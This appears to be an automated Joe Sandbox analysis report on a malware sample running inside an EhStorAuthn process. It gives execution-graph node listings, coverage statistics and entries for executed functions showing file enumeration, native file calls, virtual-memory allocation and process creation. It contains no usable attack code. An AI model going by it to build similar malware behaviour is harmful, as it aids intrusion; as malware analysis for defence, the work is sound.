                                                                          • Instruction ID: 1bae195874f4357979bf2831046baa506a1806a0275ecf2e2abcfb4245f2bd9c
                                                                          • Opcode Fuzzy Hash: 1d1a6b2c2c8aa8bd036b481d69cbfc1142576095ebe953f9e1d53f00c8ffa5ab
                                                                          • Instruction Fuzzy Hash: 6B811C72D00269DBDB39DB54CC44BEEB7B8AF58754F1041DAAA19B7240E7705E84CF60

                                                                          Execution Graph

                                                                          Execution Coverage:2.7%
                                                                          Dynamic/Decrypted Code Coverage:4.2%
                                                                          Signature Coverage:1.5%
                                                                          Total number of Nodes:455
                                                                          Total number of Limit Nodes:76
                                                                          execution_graph 92406 70ae70 92407 70ae7b 92406->92407 92409 70ae9a 92407->92409 92410 7057c0 92407->92410 92411 705822 92410->92411 92413 70582f 92411->92413 92414 6f2000 92411->92414 92413->92409 92415 6f1f9f 92414->92415 92416 6f2018 92414->92416 92421 708690 92415->92421 92420 6f1feb 92420->92413 92422 7086aa 92421->92422 92430 47c2c0a 92422->92430 92423 6f1fd6 92425 709100 92423->92425 92426 70912b 92425->92426 92427 70918f 92425->92427 92426->92420 92433 47c2e80 LdrInitializeThunk 92427->92433 92428 7091c0 92428->92420 92431 47c2c1f LdrInitializeThunk 92430->92431 92432 47c2c11 92430->92432 92431->92423 92432->92423 92433->92428 92434 7017b0 92438 7017c9 92434->92438 92435 701856 92436 701811 92442 70b1a0 92436->92442 92438->92435 92438->92436 92440 701851 92438->92440 92441 70b1a0 RtlFreeHeap 92440->92441 92441->92435 92445 7093e0 92442->92445 92444 701821 92446 7093fa 92445->92446 92447 70940b RtlFreeHeap 92446->92447 92447->92444 92448 6f58e3 92449 6f5871 92448->92449 92453 6f58bc 92448->92453 92451 6f5890 92449->92451 92454 6f7d80 92449->92454 92451->92453 92458 6f7d00 92451->92458 92455 6f7d93 92454->92455 92465 708590 92455->92465 92457 6f7dbe 92457->92451 92459 6f7d44 92458->92459 92460 6f7d65 92459->92460 92471 708360 92459->92471 92460->92451 92462 6f7d55 92463 6f7d71 92462->92463 92476 709060 92462->92476 92463->92451 92466 70860b 92465->92466 92468 7085b8 92465->92468 92470 47c2dd0 LdrInitializeThunk 92466->92470 92467 708630 92467->92457 92468->92457 92470->92467 92472 7083dd 92471->92472 92474 70838b 92471->92474 92479 47c4650 LdrInitializeThunk 92472->92479 92473 708402 92473->92462 92474->92462 92477 70907a 92476->92477 92478 70908b NtClose 92477->92478 92478->92460 92479->92473 92481 6e9da0 92483 6e9f4b 92481->92483 92484 6ea215 92483->92484 92485 70adc0 92483->92485 92486 70ae09 92485->92486 92491 6e3ff0 92486->92491 92488 70ae15 92489 70ae4e 92488->92489 92494 7052d0 92488->92494 92489->92484 92493 6e3ffd 92491->92493 92498 6f2f20 92491->92498 92493->92488 92495 705331 92494->92495 92496 70533e 92495->92496 92509 6f16d0 92495->92509 92496->92489 92499 6f2f3a 92498->92499 92501 6f2f50 92499->92501 92502 709ad0 92499->92502 92501->92493 92504 709aea 92502->92504 92503 709b19 92503->92501 92504->92503 92505 708690 LdrInitializeThunk 92504->92505 92506 709b79 92505->92506 92507 70b1a0 RtlFreeHeap 92506->92507 92508 709b92 92507->92508 92508->92501 92510 6f170b 92509->92510 92525 6f7b10 92510->92525 92512 6f1713 92524 6f19e6 92512->92524 92536 70b280 92512->92536 92514 6f1729 92515 70b280 RtlAllocateHeap 92514->92515 92516 6f1737 92515->92516 92517 70b280 RtlAllocateHeap 92516->92517 92518 6f1748 92517->92518 92520 6f17e5 92518->92520 92547 6f66b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 92518->92547 92539 6f4200 92520->92539 92522 6f1998 92543 707c10 92522->92543 92524->92496 92526 6f7b3c 92525->92526 92548 6f7a00 92526->92548 92529 6f7b69 92531 6f7b74 92529->92531 92533 709060 NtClose 92529->92533 92530 6f7b81 92532 6f7b9d 92530->92532 92534 709060 NtClose 92530->92534 92531->92512 92532->92512 92533->92531 92535 6f7b93 92534->92535 92535->92512 92559 709390 92536->92559 92538 70b298 92538->92514 92540 6f4224 92539->92540 92541 6f422b 92540->92541 92542 6f4260 LdrLoadDll 92540->92542 92541->92522 92542->92541 92544 707c72 92543->92544 92546 707c7f 92544->92546 92562 6f1a00 92544->92562 92546->92524 92547->92520 92549 6f7a1a 92548->92549 92553 6f7af6 92548->92553 92554 708730 92549->92554 92552 709060 NtClose 92552->92553 92553->92529 92553->92530 92555 70874a 92554->92555 92558 47c35c0 LdrInitializeThunk 92555->92558 92556 6f7aea 92556->92552 92558->92556 92560 7093ad 92559->92560 92561 7093be RtlAllocateHeap 92560->92561 92561->92538 92565 6f1a20 92562->92565 92578 6f7de0 92562->92578 92564 6f1f86 92564->92546 92565->92564 92582 700de0 92565->92582 92568 6f1c36 92590 70c370 92568->92590 92570 6f1a7e 92570->92564 92585 70c240 92570->92585 92571 6f7d80 LdrInitializeThunk 92572 6f1c98 92571->92572 92572->92564 92572->92571 92575 6f0530 LdrInitializeThunk 92572->92575 92573 6f1c4b 92573->92572 92596 6f0530 92573->92596 92575->92572 92576 6f1df0 92576->92572 92577 6f7d80 LdrInitializeThunk 92576->92577 92577->92576 92579 6f7ded 92578->92579 92580 6f7e0e SetErrorMode 92579->92580 92581 6f7e15 92579->92581 92580->92581 92581->92565 92600 70b110 92582->92600 92584 700e01 92584->92570 92586 70c250 92585->92586 92587 70c256 92585->92587 92586->92568 92588 70b280 RtlAllocateHeap 92587->92588 92589 70c27c 92588->92589 92589->92568 92591 70c2e0 92590->92591 92592 70c33d 92591->92592 92593 70b280 RtlAllocateHeap 92591->92593 92592->92573 92594 70c31a 92593->92594 92595 70b1a0 RtlFreeHeap 92594->92595 92595->92592 92597 6f054b 92596->92597 92607 7092f0 92597->92607 92603 7091d0 92600->92603 92602 70b141 92602->92584 92604 7091fb 92603->92604 92605 709265 92603->92605 92604->92602 92606 70927b NtAllocateVirtualMemory 92605->92606 92606->92602 92608 70930a 92607->92608 92611 47c2c70 LdrInitializeThunk 92608->92611 92609 6f0552 92609->92576 92611->92609 92612 701420 92613 70143c 92612->92613 92614 701464 92613->92614 92615 701478 92613->92615 92616 709060 NtClose 92614->92616 92617 709060 NtClose 92615->92617 92618 70146d 92616->92618 92619 701481 92617->92619 92622 70b2c0 RtlAllocateHeap 92619->92622 92621 70148c 92622->92621 92623 70c2a0 92624 70b1a0 RtlFreeHeap 92623->92624 92625 70c2b5 92624->92625 92631 708d60 92632 708e17 92631->92632 92634 708d8f 92631->92634 92633 708e2d NtCreateFile 92632->92633 92635 6f0afb PostThreadMessageW 92636 6f0b0d 92635->92636 92637 6f2478 92640 6f5f50 92637->92640 92639 6f24a3 92641 6f5f83 92640->92641 92642 6f5fa7 92641->92642 92647 708bc0 92641->92647 92642->92639 92644 6f5fca 92644->92642 92645 709060 NtClose 92644->92645 92646 6f604a 92645->92646 92646->92639 92648 708bda 92647->92648 92651 47c2ca0 LdrInitializeThunk 92648->92651 92649 708c06 92649->92644 92651->92649 92654 6f8471 92655 6f847b 92654->92655 92657 6f8461 92655->92657 92658 6f6d30 92655->92658 92659 6f6d46 92658->92659 92661 6f6d7f 92658->92661 92659->92661 92662 6f6ba0 LdrLoadDll 92659->92662 92661->92657 92662->92661 92663 6fc270 92665 6fc299 92663->92665 92664 6fc39d 92665->92664 92666 6fc343 FindFirstFileW 92665->92666 92666->92664 92668 6fc35e 92666->92668 92667 6fc384 FindNextFileW 92667->92668 92669 6fc396 FindClose 92667->92669 92668->92667 92669->92664 92670 6f6db0 92671 6f6dcc 92670->92671 92674 6f6e1c 92670->92674 92672 709060 NtClose 92671->92672 92671->92674 92677 6f6de7 92672->92677 92673 6f6f51 92674->92673 92681 6f61e0 NtClose LdrInitializeThunk LdrInitializeThunk 92674->92681 92676 6f6f2b 92676->92673 92682 6f63b0 NtClose LdrInitializeThunk LdrInitializeThunk 92676->92682 92680 6f61e0 NtClose LdrInitializeThunk LdrInitializeThunk 92677->92680 92680->92674 92681->92676 92682->92673 92683 708ed0 92684 708f77 92683->92684 92686 708efb 92683->92686 92685 708f8d NtReadFile 92684->92685 92687 705710 92688 705775 92687->92688 92689 7057b0 92688->92689 92692 7010b0 92688->92692 92691 705792 92693 701082 92692->92693 92694 7010bc 92692->92694 92695 709060 NtClose 92693->92695 92696 70109f 92695->92696 92696->92691 92697 47c2ad0 LdrInitializeThunk 92698 6eb240 92699 70b110 NtAllocateVirtualMemory 92698->92699 92700 6ec8b1 92699->92700 92701 6e9d40 92702 6e9d4f 92701->92702 92703 6e9d90 92702->92703 92704 6e9d7d CreateThread 92702->92704 92705 6ff4c0 92706 6ff524 92705->92706 92707 6f5f50 2 API calls 92706->92707 92709 6ff657 92707->92709 92708 6ff65e 92709->92708 92736 6f6060 92709->92736 92712 6ff803 92714 6ff6fe 92715 6ff812 92714->92715 92745 6ff2a0 92714->92745 92716 709060 NtClose 92715->92716 92718 6ff81c 92716->92718 92719 6ff716 92719->92715 92720 6ff721 92719->92720 92721 70b280 RtlAllocateHeap 92720->92721 92722 6ff74a 92721->92722 92723 6ff769 92722->92723 92724 6ff753 92722->92724 92754 6ff190 CoInitialize 92723->92754 92726 709060 NtClose 92724->92726 92728 6ff75d 92726->92728 92727 6ff777 92757 708b20 92727->92757 92730 6ff7f2 92731 709060 NtClose 92730->92731 92732 6ff7fc 92731->92732 92733 70b1a0 RtlFreeHeap 92732->92733 92733->92712 92734 6ff795 92734->92730 92735 708b20 LdrInitializeThunk 92734->92735 92735->92734 92737 6f6085 92736->92737 92761 7089b0 92737->92761 92740 706b70 92741 706bd5 92740->92741 92742 706c08 92741->92742 92766 7000ac RtlFreeHeap 92741->92766 92742->92714 92744 706bea 92744->92714 92746 6ff2bc 92745->92746 92747 6f4200 LdrLoadDll 92746->92747 92749 6ff2da 92747->92749 92748 6ff2e3 92748->92719 92749->92748 92750 6f4200 LdrLoadDll 92749->92750 92751 6ff3ae 92750->92751 92752 6f4200 LdrLoadDll 92751->92752 92753 6ff408 92751->92753 92752->92753 92753->92719 92756 6ff1f5 92754->92756 92755 6ff28b CoUninitialize 92755->92727 92756->92755 92758 708b3a 92757->92758 92767 47c2ba0 LdrInitializeThunk 92758->92767 92759 708b6a 92759->92734 92762 7089cd 92761->92762 92765 47c2c60 LdrInitializeThunk 92762->92765 92763 6f60f9 92763->92712 92763->92740 92765->92763 92766->92744 92767->92759 92768 6ffdc0 92769 6ffddd 92768->92769 92770 6f4200 LdrLoadDll 92769->92770 92771 6ffdfb 92770->92771 92772 706b70 RtlFreeHeap 92771->92772 92773 6fff88 92771->92773 92772->92773 92774 708640 92775 70865a 92774->92775 92778 47c2df0 LdrInitializeThunk 92775->92778 92776 708682 92778->92776 92779 7084c0 92780 7084eb 92779->92780 92781 70854f 92779->92781 92784 47c2ee0 LdrInitializeThunk 92781->92784 92782 708580 92784->92782 92785 6f989f 92786 6f98a7 92785->92786 92788 6f98b6 92785->92788 92787 70b1a0 RtlFreeHeap 92786->92787 92786->92788 92787->92788 92789 705d40 92790 705d9a 92789->92790 92792 705da7 92790->92792 92793 703770 92790->92793 92794 70b110 NtAllocateVirtualMemory 92793->92794 92796 7037b1 92794->92796 92795 7038be 92795->92792 92796->92795 92797 6f4200 LdrLoadDll 92796->92797 92799 7037f7 92797->92799 92798 703840 Sleep 92798->92799 92799->92795 92799->92798 92800 708fc0 92801 708fe8 92800->92801 92802 709034 92800->92802 92803 70904a NtDeleteFile 92802->92803 92804 6f2e13 92805 6f7a00 2 API calls 92804->92805 92806 6f2e23 92805->92806 92807 709060 NtClose 92806->92807 92808 6f2e3f 92806->92808 92807->92808 92809 6f6a10 92810 6f6a3a 92809->92810 92813 6f7bb0 92810->92813 92812 6f6a64 92814 6f7bcd 92813->92814 92820 708780 92814->92820 92816 6f7c1d 92817 6f7c24 92816->92817 92825 708860 92816->92825 92817->92812 92819 6f7c4d 92819->92812 92821 708818 92820->92821 92822 7087a8 92820->92822 92830 47c2f30 LdrInitializeThunk 92821->92830 92822->92816 92823 708851 92823->92816 92826 70890e 92825->92826 92827 70888c 92825->92827 92831 47c2d10 LdrInitializeThunk 92826->92831 92827->92819 92828 708953 92828->92819 92830->92823 92831->92828 92832 6fa9d0 92837 6fa6e0 92832->92837 92834 6fa9dd 92851 6fa360 92834->92851 92836 6fa9f9 92838 6fa705 92837->92838 92862 6f7ff0 92838->92862 92841 6fa850 92841->92834 92843 6fa867 92843->92834 92844 6fa85e 92844->92843 92846 6fa955 92844->92846 92881 6f9db0 92844->92881 92848 6fa9ba 92846->92848 92890 6fa120 92846->92890 92849 70b1a0 RtlFreeHeap 92848->92849 92850 6fa9c1 92849->92850 92850->92834 92852 6fa376 92851->92852 92859 6fa381 92851->92859 92853 70b280 RtlAllocateHeap 92852->92853 92853->92859 92854 6fa3a2 92854->92836 92855 6f7ff0 GetFileAttributesW 92855->92859 92856 6fa6b5 92857 6fa6ce 92856->92857 92858 70b1a0 RtlFreeHeap 92856->92858 92857->92836 92858->92857 92859->92854 92859->92855 92859->92856 92860 6f9db0 RtlFreeHeap 92859->92860 92861 6fa120 RtlFreeHeap 92859->92861 92860->92859 92861->92859 92863 6f8011 92862->92863 92864 6f8023 92863->92864 92865 6f8018 GetFileAttributesW 92863->92865 92864->92841 92866 703040 92864->92866 92865->92864 92867 70304e 92866->92867 92868 703055 92866->92868 92867->92844 92869 6f4200 LdrLoadDll 92868->92869 92870 70308a 92869->92870 92871 703099 92870->92871 92894 702b00 LdrLoadDll 92870->92894 92873 70b280 RtlAllocateHeap 92871->92873 92878 703244 92871->92878 92874 7030b2 92873->92874 92875 70323a 92874->92875 92877 7030ce 92874->92877 92874->92878 92876 70b1a0 RtlFreeHeap 92875->92876 92875->92878 92876->92878 92877->92878 92879 70b1a0 RtlFreeHeap 92877->92879 92878->92844 92880 70322e 92879->92880 92880->92844 92882 6f9dd6 92881->92882 92895 6fd7e0 92882->92895 92884 6f9e4b 92885 6f9fd0 92884->92885 92886 6f9e69 92884->92886 92887 6f9fb5 92885->92887 92888 6f9c70 RtlFreeHeap 92885->92888 92886->92887 92900 6f9c70 92886->92900 92887->92844 92888->92885 92891 6fa146 92890->92891 92892 6fd7e0 RtlFreeHeap 92891->92892 92893 6fa1cd 92892->92893 92893->92846 92894->92871 92897 6fd7eb 92895->92897 92896 6fd811 92896->92884 92897->92896 92898 70b1a0 RtlFreeHeap 92897->92898 92899 6fd854 92898->92899 92899->92884 92901 6f9c8d 92900->92901 92904 6fd870 92901->92904 92903 6f9d93 92903->92886 92906 6fd894 92904->92906 92905 6fd93e 92905->92903 92906->92905 92907 70b1a0 RtlFreeHeap 92906->92907 92907->92905 92908 6f6f90 92909 6f7002 92908->92909 92910 6f6fa8 92908->92910 92910->92909 92912 6faf00 92910->92912 92913 6faf26 92912->92913 92914 6fb156 92913->92914 92939 709470 92913->92939 92914->92909 92916 6faf9c 92916->92914 92917 70c370 2 API calls 92916->92917 92918 6fafb8 92917->92918 92918->92914 92919 6fb08f 92918->92919 92920 708690 LdrInitializeThunk 92918->92920 92921 6f57e0 LdrInitializeThunk 92919->92921 92923 6fb0ae 92919->92923 92922 6fb01a 92920->92922 92921->92923 92922->92919 92925 6fb023 92922->92925 92938 6fb13e 92923->92938 92945 708200 92923->92945 92924 6f7d80 LdrInitializeThunk 92929 6fb085 92924->92929 92925->92914 92931 6fb055 92925->92931 92933 6fb077 92925->92933 92942 6f57e0 92925->92942 92929->92909 92930 6f7d80 LdrInitializeThunk 92934 6fb14c 92930->92934 92960 704470 LdrInitializeThunk 92931->92960 92932 6fb115 92950 7082b0 92932->92950 92933->92924 92934->92909 92936 6fb12f 92955 708410 92936->92955 92938->92930 92940 70948d 92939->92940 92941 70949e CreateProcessInternalW 92940->92941 92941->92916 92943 708860 LdrInitializeThunk 92942->92943 92944 6f581e 92942->92944 92943->92944 92944->92931 92946 70827d 92945->92946 92948 70822b 92945->92948 92961 47c39b0 LdrInitializeThunk 92946->92961 92947 7082a2 92947->92932 92948->92932 92951 70832d 92950->92951 92952 7082db 92950->92952 92962 47c4340 LdrInitializeThunk 92951->92962 92952->92936 92953 708352 92953->92936 92956 70848a 92955->92956 92957 708438 92955->92957 92963 47c2fb0 LdrInitializeThunk 92956->92963 92957->92938 92958 7084af 92958->92938 92960->92933 92961->92947 92962->92953 92963->92958

                                                                          Executed Functions

                                                                          Function 006FC270 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 655 6fc270-6fc323 call 70b240 * 2 call 6e1410 call 7018d0 call 6e1410 call 7018d0 call 6e1410 call 7018d0 672 6fc39d-6fc3a5 655->672 673 6fc325-6fc327 655->673 673->672 674 6fc329-6fc32d 673->674 674->672 675 6fc32f-6fc331 674->675 675->672 676 6fc333-6fc35c call 6fc0c0 FindFirstFileW 675->676 676->672 679 6fc35e 676->679 680 6fc361-6fc368 679->680 681 6fc36a-6fc381 call 6fc160 680->681 682 6fc384-6fc394 FindNextFileW 680->682 681->682 682->680 684 6fc396-6fc39a FindClose 682->684 684->672
                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 006FC354
                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 006FC38F
                                                                          • FindClose.KERNELBASE(?), ref: 006FC39A
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 5a6c57099f65defe791c817b2f8ab5fb581e2cb6e1dc7637ff37b040ec40bc93
                                                                          • Instruction ID: 4b1715a1d167fb0bacf8ce68eca3f222af0a39b53320fa1b82bd57eb93fb91d7
                                                                          • Opcode Fuzzy Hash: 5a6c57099f65defe791c817b2f8ab5fb581e2cb6e1dc7637ff37b040ec40bc93
                                                                          • Instruction Fuzzy Hash: A531837250074CBBDB24DF60CC86FFF77BD9B44754F148558B608A7181DA70AB858BA0
                                                                          Function 00708D60 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00708E5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 7d9734b170010c4ac084667fe29e509b76cf4a40501081e9cefeed82f1ee1cbf
                                                                          • Instruction ID: dabda99d2844b94dd386d430ca8731767b2e8442fab8515c750f769f60911ba7
                                                                          • Opcode Fuzzy Hash: 7d9734b170010c4ac084667fe29e509b76cf4a40501081e9cefeed82f1ee1cbf
                                                                          • Instruction Fuzzy Hash: E031D6B5A01208AFDB14DF99D881EDE77F9EF8C714F108219F919A7380D730A951CBA5
                                                                          Function 00708ED0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00708FB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 8628baa00eeb20c27a3a3c652945a02e5a33cdc8bc9a1baa74aa27edfafa21f0
                                                                          • Instruction ID: 7d0cb9bb9a1687ef585b688c478795da068c236112f53e8f5a62c805962f7bb4
                                                                          • Opcode Fuzzy Hash: 8628baa00eeb20c27a3a3c652945a02e5a33cdc8bc9a1baa74aa27edfafa21f0
                                                                          • Instruction Fuzzy Hash: E931C8B5A04208AFDB14DF98D881EEF77F9EF88714F108219F919A7280D770A911CBA5
                                                                          Function 007091D0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(006F1A7E,?,00707C7F,00000000,00000004,00003000,?,?,?,?,?,00707C7F,006F1A7E,00707C7F,6AB05589,006F1A7E), ref: 00709298
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: 0a1abe83959c0b6f281077450865f9d0de8fb66725858892d53971d65e90dd69
                                                                          • Instruction ID: 987836c8fa57e7f60d1308cd18292d546ed5f8a934323e8859a2e91971d98938
                                                                          • Opcode Fuzzy Hash: 0a1abe83959c0b6f281077450865f9d0de8fb66725858892d53971d65e90dd69
                                                                          • Instruction Fuzzy Hash: A52117B5A04208EBDB14DF98DC41EEFB7B9EF88710F008219F918A7280D774A911CBA5
                                                                          Function 00708FC0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: f93854eec5ac7047126131a50d15725e9e0fc64a6b3f3b32b99ea7f63d8223c9
                                                                          • Instruction ID: 6f45020d6d975278812da5842600f7bddbe7745dba51fdf191d657c628f4189e
                                                                          • Opcode Fuzzy Hash: f93854eec5ac7047126131a50d15725e9e0fc64a6b3f3b32b99ea7f63d8223c9
                                                                          • Instruction Fuzzy Hash: 57117371A00244FBD620EB64CC46FEF77ACEF85710F408659FA089B281D7757905C7A5
                                                                          Function 00709060 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00709094
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 238c78508bed0e6f854b915faa3d91bc94ed0096435d2cdf997d36a67c8fcb6c
                                                                          • Instruction ID: 9100dcb4822c11fb5bb3dcf1e47288647f0e301404a6e6f7b602a177907fe114
                                                                          • Opcode Fuzzy Hash: 238c78508bed0e6f854b915faa3d91bc94ed0096435d2cdf997d36a67c8fcb6c
                                                                          • Instruction Fuzzy Hash: 68E08635300304BBC210EB59DC01F9B779CDFC5750F018419FA08A7281D671B91187F5
                                                                          Function 047C4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2b861be3f4a1c98a4c0f06ce9fa41aa6f1211e7b30cd777092263347f5fd21c2
                                                                          • Instruction ID: 715bd6ee1f5b3ebc4dc78f9bb186a49410adb4704652f0a94845f3a3e241bbc0
                                                                          • Opcode Fuzzy Hash: 2b861be3f4a1c98a4c0f06ce9fa41aa6f1211e7b30cd777092263347f5fd21c2
                                                                          • Instruction Fuzzy Hash: D89002656115104261507158480440660259BE1305396C125A0655570C8618D955926A
                                                                          Function 047C4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7c41624b768b3cbddda74f9010c4dfc06b7fb84b228c54a5b541b334fe7bd4fc
                                                                          • Instruction ID: f6350de4904976544145a519f610ce4c45c78701f7146322e6c7bf54b76d5439
                                                                          • Opcode Fuzzy Hash: 7c41624b768b3cbddda74f9010c4dfc06b7fb84b228c54a5b541b334fe7bd4fc
                                                                          • Instruction Fuzzy Hash: EC90023561581012B1507158488454640259BE0305B56C021E0525574C8A14DA565362
                                                                          Function 047C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                                                          • Instruction ID: 04ad1aca25ecfbc333dc90cc8bf8d080045fced0e6f1c983c576dbeb9ed0ce0f
                                                                          • Opcode Fuzzy Hash: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                                                          • Instruction Fuzzy Hash: 6890023521149802F1207158840474A00258BD0305F5AC421A4525678D8695D9917122
                                                                          Function 047C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                                                          • Instruction ID: 739ca9f4f9ebb5346da7671796f3f29602c611bf04f269e54c77bb904c6fc183
                                                                          • Opcode Fuzzy Hash: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                                                          • Instruction Fuzzy Hash: CB90023521141842F11071584404B4600258BE0305F56C026A0225674D8615D9517522
                                                                          Function 047C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
